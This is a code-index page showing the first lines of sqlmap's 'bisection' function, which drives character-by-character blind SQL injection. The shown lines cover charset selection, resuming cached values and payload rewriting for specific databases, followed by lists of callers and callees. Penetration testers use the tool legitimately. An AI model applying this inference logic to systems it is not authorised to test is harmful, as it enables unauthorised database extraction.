MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / bisection

Function bisection

lib/techniques/blind/inference.py:67–730  ·  view source on GitHub ↗

Bisection algorithm that can be used to perform blind SQL injection on an affected host

(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False)

Source from the content-addressed store, hash-verified

65from thirdparty import six
66
67def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
68 """
69 Bisection algorithm that can be used to perform blind SQL injection
70 on an affected host
71 """
72
73 abortedFlag = False
74 showEta = False
75 partialValue = u""
76 finalValue = None
77 retrievedLength = 0
78
79 if payload is None:
80 return 0, None
81
82 if charsetType is None and conf.charset:
83 asciiTbl = sorted(set(ord(_) for _ in conf.charset))
84 else:
85 asciiTbl = getCharset(charsetType)
86
87 threadData = getCurrentThreadData()
88 timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
89 retVal = hashDBRetrieve(expression, checkConf=True)
90
91 if retVal:
92 if conf.repair and INFERENCE_UNKNOWN_CHAR in retVal:
93 pass
94 elif PARTIAL_HEX_VALUE_MARKER in retVal:
95 retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "")
96
97 if retVal and conf.hexConvert:
98 partialValue = retVal
99 infoMsg = "resuming partial value: %s" % safecharencode(partialValue)
100 logger.info(infoMsg)
101 elif PARTIAL_VALUE_MARKER in retVal:
102 retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")
103
104 if retVal and not conf.hexConvert:
105 partialValue = retVal
106 infoMsg = "resuming partial value: %s" % safecharencode(partialValue)
107 logger.info(infoMsg)
108 else:
109 infoMsg = "resumed: %s" % safecharencode(retVal)
110 logger.info(infoMsg)
111
112 return 0, retVal
113
114 if Backend.isDbms(DBMS.MCKOI):
115 match = re.search(r"\ASELECT\b(.+)\bFROM\b(.+)\Z", expression, re.I)
116 if match:
117 original = queries[Backend.getIdentifiedDbms()].inference.query
118 right = original.split('<')[1]
119 payload = payload.replace(right, "(SELECT %s FROM %s)" % (right, match.group(2).strip()))
120 expression = match.group(1).strip()
121
122 elif Backend.isDbms(DBMS.FRONTBASE):
123 match = re.search(r"\ASELECT\b(\s+TOP\s*\([^)]+\)\s+)?(.+)\bFROM\b(.+)\Z", expression, re.I)
124 if match:

Callers 2

_goInferenceFunction · 0.90
queryOutputLengthFunction · 0.85

Calls 15

progressMethod · 0.95
getCharsetFunction · 0.90
getCurrentThreadDataFunction · 0.90
getTechniqueFunction · 0.90
hashDBRetrieveFunction · 0.90
safecharencodeFunction · 0.90
getPartRunFunction · 0.90
isDigitFunction · 0.90
ProgressBarClass · 0.90
singleTimeWarnMessageFunction · 0.90
dataToStdoutFunction · 0.90
runThreadsFunction · 0.90

Tested by

no test coverage detected

Used in the wild real call sites across dependent graphs

searching dependent graphs…